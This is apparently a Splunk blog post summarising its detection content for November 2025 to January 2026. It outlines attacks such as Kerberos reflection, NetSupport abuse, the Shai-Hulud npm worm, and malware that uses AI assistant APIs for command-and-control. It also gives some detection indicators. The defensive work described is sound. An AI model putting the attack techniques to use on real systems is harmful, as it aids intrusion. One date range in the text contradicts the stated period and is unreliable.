Splunk Security Content for Threat Detection & Response: February 2026 Update

Looking for the latest Splunk security content? You’ve come to the right place! This page is updated quarterly with all the latest security content details.

This blog post covers security content developed November 2025 - January 2026. Jump straight to the updates below, or read on to learn more about:

How Splunk develops security content
The types of content we deliver
How to access security content

See the latest Splunk Security Content >

Splunk continuously monitors the threat landscape to develop, test, and deliver security content to help identify and respond to vulnerabilities and cyber attacks within your environment.

Types of Security Content

Splunk provides a variety of security content, all of which is designed to help you make the most of your Splunk environment. This includes:

Detections

Splunk’s out-of-the-box detection searches are created to help identify patterns and alert you to threats and anomalous behavior.

Analytic Stories

All detection searches relevant to a particular threat are packaged in the form of analytic stories (also known as use cases).

SOAR Playbook Packs

A collection of pre-built automation playbooks that are designed to help users tackle specific use cases.

How to get Security Content

Take advantage of security content in two ways:

Both apps allow you to deploy the over 1,900 out-of-the-box searches to start detecting, investigating and responding to threats. You can also view the full security content repository by visiting research.splunk.com.

And with that information, we can move onto the latest content. Let's take a look!

Splunk Security Content: November 2025 – January 2026

Below you will find a brief table of contents, followed by an overview of the security content developed from February 2025 - April 2025.

Adversary Tradecraft Analytic Stories

Emerging Threats Analytic Stories

Overview: Adversary Tradecraft Analytic Stories

The Splunk Threat Research Team created several new analytic stories to help identify activity related to various malware threats:

CVE-2025-33073 is a critical vulnerability related to Kerberos Reflection attacks impacting Active Directory environments. The journey began with a configuration involving a Domain Controller set up in a lab environment where offensive tradecraft was being developed. The attacker utilized a DNS record manipulation technique that involved appending a specific "magic string" to the hostname, which ultimately enabled successful coercive authentication, leading to remote code execution as SYSTEM.

The STRT released an analytic story for the NetSupport Remote Manager Tool primarily focusing on identifying its misuse, as it's a legitimate tool often leveraged by adversaries. Endpoint detection involves flagging the client32.exe executable running from unusual directories like Downloads or ProgramData instead of its standard Program Files location. Suspicious activity also encompasses renamed binaries with the internal name "client32" communicating with netsupportsoftware.com, or unauthenticated remote control sessions.

This analytic story addresses the growing security challenge of Shadow AI - the deployment and use of unauthorized Large Language Model (LLM) frameworks and AI tools within enterprise environments without proper governance, oversight, or security controls. Shadow AI deployments pose significant risks including data exfiltration through local model inference (where sensitive corporate data is processed by unmonitored AI systems), intellectual property leakage, policy violations, and creation of security blind spots that bypass enterprise data loss prevention and monitoring solutions.

The Browser Hijacking analytic story detects behaviors associated with browser hijacking techniques where malware manipulates browser configurations, preferences, or registry settings to alter browsing behavior, disable updates, and install unauthorized extensions. Modern hijackers may directly modify Chrome preference files, use automation to inject unwanted content, or change policy settings (including allowlisting extensions) to persist and evade standard protections.

Cisco Isovalent Suspicious Activity focuses on identifying suspicious activities and potential security threats within environments using Cisco Isovalent in Kubernetes. It provides detection analytics and guidance to help security teams recognize signs of adversary tactics such as unauthorized access attempts, unusual network activity, and other behaviors indicative of potential compromise in their Kubernetes environments.

SesameOp is a Backdoor that abuses the OpenAI Assistants API as its command-and-control (C2) channel. Instead of using a traditional malicious server infrastructure, the malware loads a heavily obfuscated .NET DLL (Netapi64.dll / OpenAIAgent.Netapi64) which reaches out to the Assistants API to fetch encrypted, compressed commands and then executes them on the infected host.

Suspicious User Agents leverages advanced Splunk searches to detect and investigate suspicious user agent strings on the network, including malware, command and control frameworks, RMM software, and other unwanted programs.

Overview: Emerging Threats Analytic Stories

The STRT released an analytic story to detect npm supply chain compromises, including the Shai-Hulud worm and its 2.0 variant. Recent incidents highlight self-replicating worms ("Shai-Hulud" and "Shai-Hulud 2.0") abusing the npm ecosystem. After compromising developer credentials, malicious packages execute during preinstall/postinstall phases to exfiltrate secrets, plant malicious GitHub Actions workflows, register self-hosted runner backdoors, and republish tampered packages to spread across the ecosystem.

Tuoni is a sophisticated, cross-platform red teaming framework designed to enhance cybersecurity education and training through large-scale cyber defense exercises. The Team also released an analytic story on Castle RAT that allows you to detect and investigate unusual activities that may be related to the remote access trojan observed in targeted intrusion campaigns.

PromptFlux is a POC malware sample that abuses Gemini-like services for command-and-control operations. It achieves persistence by dropping executables or scripts in startup folders and frequently accesses the Gemini API using hard-coded keys or unauthorized requests, often from non-standard processes. The STRT team also release the analytic story, React2Shell (CVE-2025-55182), a critical pre-authentication Remote Code Execution (RCE) vulnerability in React Server Components.

The team also published the following blogs: